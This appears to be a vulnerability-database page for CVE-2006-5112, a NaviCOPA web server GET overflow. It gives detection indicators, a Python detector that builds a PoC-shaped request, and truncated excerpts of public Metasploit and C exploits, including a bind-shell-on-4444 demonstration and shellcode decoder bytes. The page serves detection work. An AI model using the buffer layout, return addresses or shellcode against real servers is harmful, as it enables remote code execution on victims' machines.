CVE-2006-5112
Published 2006-10-03
Priority: P2 · 62 · high · CVSS 2.0: 7.5 · vector AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit available · EPSS 66.83% (99.2nd percentile)
Buffer overflow in InterVations NaviCOPA Web Server 2.01 allows remote attackers to execute arbitrary code via a long HTTP GET request.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| intervations | navicopa_web_server | — | — |
| intervations | navicopa_web_server | — | — |
Detection & IOCs (extracted from sources)
bytes (the PexFnstenvMov decoder prologue of the PoC shellcode):
\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x91\xba\x06\x13\x83\xeb\xfc\xe2\xf4
- Detect exploit attempts by matching HTTP GET requests with oversized URL parameters (~228+ bytes) sent to port 80 against NaviCOPA 2.0.1 servers; the buffer overflow triggers at 228–234 bytes of URL path data.
- Fingerprint vulnerable NaviCOPA 2.0.1 servers by checking HTTP banner responses containing the string '2.01 11th September'.
- The exploit payload bad characters for the NaviCOPA GET overflow are 0x00, 0x3a, 0x26, 0x3f, 0x25, 0x23, 0x20, 0x0a, 0x0d, 0x2f, 0x2b, 0x0b, 0x5c; the payload can never contain these bytes, so a rule that expects a leading '/' or percent-encoding in the URI would miss it. Use the list to tune IDS rules and avoid such false negatives.
- The exploit uses a return address in IV320009.dll (a NaviCOPA component DLL); that DLL loaded in a web server process, combined with anomalous GET requests, is a strong indicator of exploitation.
- Post-exploitation, the bind shellcode in the public PoC opens a shell on port 4444; monitor for unexpected inbound connections on TCP/4444 to NaviCOPA server hosts.
- The exploit buffer structure is 'GET ' + ('A' * 230) + RET + (NOP * 32) + shellcode + ' HTTP/1.1\r\n\r\n'; use this pattern for Snort/Suricata content matching on an oversized GET URI with a NOP sled.
- Caveat: the Metasploit module targets NaviCOPA 2.0.1 specifically; the return address 0x1009b4ff is hardcoded for IV320009.dll and will not work against other versions or patched builds.
- Caveat: CVE-2006-5112 is noted as probably a different issue from CVE-2007-2336 and CVE-2007-1733; detection rules should not conflate these three NaviCOPA vulnerabilities.
- Caveat: the older Metasploit (Perl) module uses a slightly different offset (227–228 bytes) and a different return address (0x1002c46f, push esp/ret in IV320009.dll) compared to the newer Ruby module (0x1009b4ff); both target the same vulnerability but may require different detection thresholds.
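The indicators above combine into a small request-line inspector. This is an added example, not code from the page's sources or from the Metasploit module: it parses one raw HTTP request, fires on the length, missing-leading-slash, raw-binary, NOP-sled and decoder-stub indicators, and fingerprints the vulnerable banner from a response. The decoder match generalises the exact bytes quoted above by wildcarding the 4-byte XOR key, so it catches any PexFnstenvMov-encoded payload, not just the one in the PoC. The `Server:` header layout, the indicator names and `sample_overflow_request()` are assumptions; the sample is a constructed test vector shaped like the PoC buffer (decoder stub plus filler, not a working payload).

```python
import re

# Thresholds and patterns below come from the indicators listed on this page;
# the banner text and sample requests are constructed for this example.
URI_OVERFLOW_LEN = 228          # overflow reported at 228-234 bytes of URL path
NOP_SLED_MIN = 16               # public PoC uses 32 NOPs; 16 keeps the rule tolerant
VULNERABLE_BANNER = b"2.01 11th September"

# PexFnstenvMov decoder prologue: fldz / fnstenv [esp-0xc] / pop ebx / xor [ebx+0x13], key ...
# The 4-byte XOR key differs per payload, so it is wildcarded (generalisation of the
# exact stub bytes quoted above).
PEX_FNSTENV_RE = re.compile(
    rb"\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13.{4}\x83\xeb\xfc\xe2\xf4", re.DOTALL)


def parse_request_line(raw: bytes):
    """Return (method, target, version) from the first line, or None if malformed."""
    line = raw.split(b"\r\n", 1)[0]
    parts = line.split(b" ")
    if len(parts) < 3:
        return None
    # 0x20 is a bad char, so an exploit target never contains a space; the middle join
    # only matters for sloppy clients that leave spaces unencoded.
    return parts[0], b" ".join(parts[1:-1]), parts[-1]


def inspect_request(raw: bytes) -> list:
    """Return the sorted list of indicator names that fire on one raw HTTP request."""
    hits = set()
    parsed = parse_request_line(raw)
    if parsed is None:
        return ["malformed_request_line"]
    method, target, _version = parsed
    if method == b"GET" and len(target) >= URI_OVERFLOW_LEN:
        hits.add("uri_overflow_length")
    if not target.startswith((b"/", b"http://", b"https://", b"*")):
        hits.add("target_missing_leading_slash")  # PoC sends 'GET AAAA...'; '/' is a bad char
    if any(b < 0x20 or b > 0x7e for b in target):
        hits.add("raw_binary_in_target")          # '%' is a bad char, so nothing is URL-encoded
    if b"\x90" * NOP_SLED_MIN in raw:
        hits.add("nop_sled")
    if PEX_FNSTENV_RE.search(raw):
        hits.add("pex_fnstenv_decoder")
    return sorted(hits)


def is_vulnerable_banner(response: bytes) -> bool:
    """True when the response header block carries the version string named above."""
    head = response.split(b"\r\n\r\n", 1)[0]
    return VULNERABLE_BANNER in head


def sample_overflow_request() -> bytes:
    """Constructed test vector shaped like the PoC buffer (detector input, not a payload)."""
    ret = b"\xff\xb4\x09\x10"   # 0x1009b4ff little-endian, the Ruby module's return address
    stub = (b"\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13"
            b"\x91\xba\x06\x13\x83\xeb\xfc\xe2\xf4")
    return (b"GET " + b"A" * 230 + ret + b"\x90" * 32 + stub + b"\xcc" * 64
            + b" HTTP/1.1\r\n\r\n")


if __name__ == "__main__":
    samples = [("benign", b"GET /index.html HTTP/1.1\r\nHost: x\r\n\r\n"),
               ("poc-shaped", sample_overflow_request())]
    for name, req in samples:
        print(name, inspect_request(req))
```

The same five checks map onto Snort/Suricata rules: the length test via a URI-length keyword and the NOP and decoder bytes via content matches. Treat the leading-slash and raw-binary checks as corroborating signals rather than sufficient on their own, since non-standard but harmless clients also trip them.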
GHSA-xwx8-pcpq-9jrq (unreviewed · 2022-05-01 · CVSS 7.5) · CVE-2007-1733 [HIGH]
Buffer overflow in InterVations NaviCOPA HTTP Server 2.01 allows remote attackers to execute arbitrary code via a long (1) /cgi-bin/ or (2) /cgi/ pathname in an HTTP GET request, probably a different issue than CVE-2006-5112.
GHSA-g7h8-fmq9-8m32 (unreviewed · 2022-05-01) · CVE-2006-5112 [HIGH]
Buffer overflow in InterVations NaviCOPA Web Server 2.01 allows remote attackers to execute arbitrary code via a long HTTP GET request.
GHSA-hxx6-rmq4-pmj6 (unreviewed · 2022-05-01 · CVSS 7.5) · CVE-2007-2336 [HIGH]
Unspecified vulnerability in InterVations NaviCOPA Web Server 2.01 20070323 allows remote attackers to cause a denial of service (daemon crash) via crafted HTTP requests, as demonstrated by long requests containing '\A' characters, probably a different issue than CVE-2006-5112 and CVE-2007-1733. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
No detection rules found.
Exploit-DB · 2010-07-12 · CVE-2006-5112
NaviCOPA Web Server 2.0.1 - URL Handling Buffer Overflow (Metasploit)
```ruby
##
# $Id: navicopa_get_overflow.rb 9797 2010-07-12 23:25:31Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	HttpFingerprint = { :pattern => [ /InterVations/ ] }

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'NaviCOPA 2.0.1 URL Handling Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in NaviCOPA 2.0.1.
				The vulnerability is caused due to a boundary error within the
				handling of URL parameters.
			},
			'Author'         => '
```
Exploit-DB · 2007-01-07 · CVE-2006-5112
NaviCOPA Web Server 2.01 - 'GET' Remote Buffer Overflow (Metasploit)
```perl
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::navicopa_get_overflow;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info =
{
	'Name'     => 'Navicopa 2.01 Buffer Overflow',
	'Version'  => '$Revision: 0.1 $',
	'Authors'  => [ 'Jacopo Cervini ', ],
	'Arch'     => [ 'x86' ],
	'OS'       => [ 'win32' ],
	'Priv'     => 1,

	'UserOpts' =>
	{
		'RHOST' => [1, 'ADDR', 'The target address'],
```
Exploit-DB · 2006-09-27 · CVE-2006-5112
NaviCOPA Web Server 2.01 - 'GET' Remote Buffer Overflow
```c
/*
navi_exp.c
NaviCOPA Web Server 2.01 0day Remote Buffer Overflow Exploit
Coded by h07
Tested on XP SP2 Polish, 2000 SP4 Polish

Example:
C:\>navi_exp 192.168.0.1 0
[*] NaviCOPA Web Server 2.01 0day Remote Buffer Overflow Exploit
[*] Coded by h07
[+] Sending buffer: OK
[*] Check your shell on 192.168.0.1:4444
[*] Press enter to quit

C:\>nc -v 192.168.0.1 4444
[192.168.0.1] 4444 (?) open
Microsoft Windows XP [Wersja 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\windows\system32>
*/

#include

#define PORT 80
#define BUFF_SIZE 1024

typedef struct
{
	char os_name[32];
	unsigned long ret;
} target;

char shellcode[] =
/*
Win32_bind shellcode
Encoder: PexFnstenvMov
Bad chars: 0x00 0x20 0x0a 0x0d 0x2f 0x3f
Thx metasploit.c
```
Metasploit · navicopa_get_overflow
NaviCOPA 2.0.1 URL Handling Buffer Overflow
This module exploits a stack buffer overflow in NaviCOPA 2.0.1. The vulnerability is caused due to a boundary error within the handling of URL parameters.
No writeups or analysis indexed.
References:
- http://secunia.com/advisories/22124
- http://www.kb.cert.org/vuls/id/693992
- http://www.securityfocus.com/bid/20250
- http://www.vupen.com/english/advisories/2006/3819
- https://exchange.xforce.ibmcloud.com/vulnerabilities/29221
- https://www.exploit-db.com/exploits/2445